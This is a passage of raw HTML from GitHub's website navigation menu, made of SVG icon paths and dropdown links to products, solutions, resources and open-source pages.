6.122-2.093 2.731 0 4.767.957 6.166 2.093.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086.23.462.477 1.088.644 1.517 1.258.364 2.233 1.721 2.605 2.656a.832.832 0 0 1 .053.22v2.869a.641.641 0 0 1-.078.256ZM12.172 11h-.344a4.323 4.323 0 0 1-.355.508C10.703 12.455 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a2.005 2.005 0 0 1-.085-.104L4 11.741v6.585c1.435.779 4.514 2.179 8 2.179 3.486 0 6.565-1.4 8-2.179v-6.585l-.098-.104s-.033.045-.085.104c-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.545-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.016.016Zm.641-2.935c.136 1.057.403 1.913.878 2.497.442.544 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.15.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.319-.862-2.824-1.025-1.487-.161-2.192.138-2.533.529-.269.307-.437.808-.438 1.578v.021c0 .265.021.562.063.893Zm-1.626 0c.042-.331.063-.628.063-.894v-.02c-.001-.77-.169-1.271-.438-1.578-.341-.391-1.046-.69-2.533-.529-1.505.163-2.347.537-2.824 1.025-.462.472-.705 1.179-.705 2.319 0 1.211.175 1.926.558 2.361.365.414 1.084.751 2.657.751 1.21 0 1.902-.394 2.344-.938.475-.584.742-1.44.878-2.497Z"></path><path d="M14.5 14.25a1 1 0 0 1 1 1v2a1 1 0 0 1-2 0v-2a1 1 0 0 1 1-1Zm-5 0a1 1 0 0 1 1 1v2a1 1 0 0 1-2 0v-2a1 1 0 0 1 1-1Z"></path> </svg> <div> <div class="color-fg-default h4">GitHub Copilot</div> Write better code with AI </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{"location":"navbar","action":"github_advanced_security","context":"product","tag":"link","label":"github_advanced_security_link_product_navbar"}" href="https://github.com/security/advanced-security"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path> </svg> <div> <div class="color-fg-default h4">GitHub Advanced Security</div> Find and fix vulnerabilities </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{"location":"navbar","action":"actions","context":"product","tag":"link","label":"actions_link_product_navbar"}" href="https://github.com/features/actions"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path> </svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{"location":"navbar","action":"codespaces","context":"product","tag":"link","label":"codespaces_link_product_navbar"}" href="https://github.com/features/codespaces"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path> </svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{"location":"navbar","action":"issues","context":"product","tag":"link","label":"issues_link_product_navbar"}" href="https://github.com/features/issues"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path> </svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{"location":"navbar","action":"code_review","context":"product","tag":"link","label":"code_review_link_product_navbar"}" href="https://github.com/features/code-review"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path> </svg> <div> <div class="color-fg-default h4">Code Review</div> Manage code changes </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{"location":"navbar","action":"discussions","context":"product","tag":"link","label":"discussions_link_product_navbar"}" href="https://github.com/features/discussions"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path> </svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description" data-analytics-event="{"location":"navbar","action":"code_search","context":"product","tag":"link","label":"code_search_link_product_navbar"}" href="https://github.com/features/code-search"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-square color-fg-subtle mr-3"> <path d="M10.3 8.24a.75.75 0 0 1-.04 1.06L7.352 12l2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M2 3.75C2 2.784 2.784 2 3.75 2h16.5c.966 0 1.75.784 1.75 1.75v16.5A1.75 1.75 0 0 1 20.25 22H3.75A1.75 1.75 0 0 1 2 20.25Zm1.75-.25a.25.25 0 0 0-.25.25v16.5c0 .138.112.25.25.25h16.5a.25.25 0 0 0 .25-.25V3.75a.25.25 0 0 0-.25-.25Z"></path> </svg> <div> <div class="color-fg-default h4">Code Search</div> Find more, search less </div> </a></li> </ul> </div> </div> <div class="HeaderMenu-column px-lg-4"> <div class="border-bottom pb-3 pb-lg-0 border-lg-bottom-0 border-bottom-0"> <span class="d-block h4 color-fg-default my-1" id="product-explore-heading">Explore</span> <ul class="list-style-none f5" aria-labelledby="product-explore-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"all_features","context":"product","tag":"link","label":"all_features_link_product_navbar"}" href="https://github.com/features"> All features </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary Link--external" target="_blank" data-analytics-event="{"location":"navbar","action":"documentation","context":"product","tag":"link","label":"documentation_link_product_navbar"}" href="https://docs.github.com"> Documentation <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path> </svg> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary Link--external" target="_blank" data-analytics-event="{"location":"navbar","action":"github_skills","context":"product","tag":"link","label":"github_skills_link_product_navbar"}" href="https://skills.github.com"> GitHub Skills <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path> </svg> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary Link--external" target="_blank" data-analytics-event="{"location":"navbar","action":"blog","context":"product","tag":"link","label":"blog_link_product_navbar"}" href="https://github.blog"> Blog <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path> </svg> </a></li> </ul> </div> </div> </div> </li> <li class="HeaderMenu-item position-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path> </svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 pt-2 pt-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex flex-wrap dropdown-menu-wide"> <div class="HeaderMenu-column px-lg-4 border-lg-right mb-4 mb-lg-0 pr-lg-7"> <div class="border-bottom pb-3 pb-lg-0 border-lg-bottom-0 pb-lg-3 mb-3 mb-lg-0"> <span class="d-block h4 color-fg-default my-1" id="solutions-by-company-size-heading">By company size</span> <ul class="list-style-none f5" aria-labelledby="solutions-by-company-size-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"enterprises","context":"solutions","tag":"link","label":"enterprises_link_solutions_navbar"}" href="https://github.com/enterprise"> Enterprises </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"small_and_medium_teams","context":"solutions","tag":"link","label":"small_and_medium_teams_link_solutions_navbar"}" href="https://github.com/team"> Small and medium teams </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"startups","context":"solutions","tag":"link","label":"startups_link_solutions_navbar"}" href="https://github.com/enterprise/startups"> Startups </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"nonprofits","context":"solutions","tag":"link","label":"nonprofits_link_solutions_navbar"}" href="/solutions/industry/nonprofits"> Nonprofits </a></li> </ul> </div> <div class="border-bottom pb-3 pb-lg-0 border-lg-bottom-0"> <span class="d-block h4 color-fg-default my-1" id="solutions-by-use-case-heading">By use case</span> <ul class="list-style-none f5" aria-labelledby="solutions-by-use-case-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"devsecops","context":"solutions","tag":"link","label":"devsecops_link_solutions_navbar"}" href="/solutions/use-case/devsecops"> DevSecOps </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"devops","context":"solutions","tag":"link","label":"devops_link_solutions_navbar"}" href="/solutions/use-case/devops"> DevOps </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"ci_cd","context":"solutions","tag":"link","label":"ci_cd_link_solutions_navbar"}" href="/solutions/use-case/ci-cd"> CI/CD </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"view_all_use_cases","context":"solutions","tag":"link","label":"view_all_use_cases_link_solutions_navbar"}" href="/solutions/use-case"> View all use cases </a></li> </ul> </div> </div> <div class="HeaderMenu-column px-lg-4"> <div class="border-bottom pb-3 pb-lg-0 border-lg-bottom-0"> <span class="d-block h4 color-fg-default my-1" id="solutions-by-industry-heading">By industry</span> <ul class="list-style-none f5" aria-labelledby="solutions-by-industry-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"healthcare","context":"solutions","tag":"link","label":"healthcare_link_solutions_navbar"}" href="/solutions/industry/healthcare"> Healthcare </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"financial_services","context":"solutions","tag":"link","label":"financial_services_link_solutions_navbar"}" href="/solutions/industry/financial-services"> Financial services </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"manufacturing","context":"solutions","tag":"link","label":"manufacturing_link_solutions_navbar"}" href="/solutions/industry/manufacturing"> Manufacturing </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"government","context":"solutions","tag":"link","label":"government_link_solutions_navbar"}" href="/solutions/industry/government"> Government </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"view_all_industries","context":"solutions","tag":"link","label":"view_all_industries_link_solutions_navbar"}" href="/solutions/industry"> View all industries </a></li> </ul> </div> </div> <div class="HeaderMenu-trailing-link rounded-bottom-2 flex-shrink-0 mt-lg-4 px-lg-4 py-4 py-lg-3 f5 text-semibold"> <a href="/solutions"> View all solutions <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-right HeaderMenu-trailing-link-icon"> <path d="M6.22 3.22a.75.75 0 0 1 1.06 0l4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L9.94 8 6.22 4.28a.75.75 0 0 1 0-1.06Z"></path> </svg> </a> </div> </div> </li> <li class="HeaderMenu-item position-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Resources <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path> </svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 pt-2 pt-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 pb-2 pb-lg-4 d-lg-flex flex-wrap dropdown-menu-wide"> <div class="HeaderMenu-column px-lg-4 border-lg-right mb-4 mb-lg-0 pr-lg-7"> <div class="border-bottom pb-3 pb-lg-0 border-lg-bottom-0"> <span class="d-block h4 color-fg-default my-1" id="resources-topics-heading">Topics</span> <ul class="list-style-none f5" aria-labelledby="resources-topics-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"ai","context":"resources","tag":"link","label":"ai_link_resources_navbar"}" href="/resources/articles/ai"> AI </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"devops","context":"resources","tag":"link","label":"devops_link_resources_navbar"}" href="/resources/articles/devops"> DevOps </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"security","context":"resources","tag":"link","label":"security_link_resources_navbar"}" href="/resources/articles/security"> Security </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"software_development","context":"resources","tag":"link","label":"software_development_link_resources_navbar"}" href="/resources/articles/software-development"> Software Development </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"view_all","context":"resources","tag":"link","label":"view_all_link_resources_navbar"}" href="/resources/articles"> View all </a></li> </ul> </div> </div> <div class="HeaderMenu-column px-lg-4"> <div class="border-bottom pb-3 pb-lg-0 border-lg-bottom-0 border-bottom-0"> <span class="d-block h4 color-fg-default my-1" id="resources-explore-heading">Explore</span> <ul class="list-style-none f5" aria-labelledby="resources-explore-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary Link--external" target="_blank" data-analytics-event="{"location":"navbar","action":"learning_pathways","context":"resources","tag":"link","label":"learning_pathways_link_resources_navbar"}" href="https://resources.github.com/learn/pathways"> Learning Pathways <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path> </svg> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary Link--external" target="_blank" data-analytics-event="{"location":"navbar","action":"events_amp_webinars","context":"resources","tag":"link","label":"events_amp_webinars_link_resources_navbar"}" href="https://resources.github.com"> Events & Webinars <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path> </svg> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"ebooks_amp_whitepapers","context":"resources","tag":"link","label":"ebooks_amp_whitepapers_link_resources_navbar"}" href="https://github.com/resources/whitepapers"> Ebooks & Whitepapers </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"customer_stories","context":"resources","tag":"link","label":"customer_stories_link_resources_navbar"}" href="https://github.com/customer-stories"> Customer Stories </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary Link--external" target="_blank" data-analytics-event="{"location":"navbar","action":"partners","context":"resources","tag":"link","label":"partners_link_resources_navbar"}" href="https://partner.github.com"> Partners <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path> </svg> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"executive_insights","context":"resources","tag":"link","label":"executive_insights_link_resources_navbar"}" href="https://github.com/solutions/executive-insights"> Executive Insights </a></li> </ul> </div> </div> </div> </li> <li class="HeaderMenu-item position-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path> </svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 pt-2 pt-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 pb-2 pb-lg-4 px-lg-4"> <div class="HeaderMenu-column"> <div class="border-bottom pb-3 pb-lg-0 pb-lg-3 mb-3 mb-lg-0 mb-lg-3"> <ul class="list-style-none f5" > <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description" data-analytics-event="{"location":"navbar","action":"github_sponsors","context":"open_source","tag":"link","label":"github_sponsors_link_open_source_navbar"}" href="/sponsors"> <div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div> </a></li> </ul> </div> <div class="border-bottom pb-3 pb-lg-0 pb-lg-3 mb-3 mb-lg-0 mb-lg-3"> <ul class="list-style-none f5" > <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description" data-analytics-event="{"location":"navbar","action":"the_readme_project","context":"open_source","tag":"link","label":"the_readme_project_link_open_source_navbar"}" href="https://github.com/readme"> <div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div> </a></li> </ul> </div> <div class="border-bottom pb-3 pb-lg-0 border-bottom-0"> <span class="d-block h4 color-fg-default my-1" id="open-source-repositories-heading">Repositories</span> <ul class="list-style-none f5" aria-labelledby="open-source-repositories-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"topics","context":"open_source","tag":"link","label":"topics_link_open_source_navbar"}" href="https://github.com/topics"> Topics </a></li> <li> <a 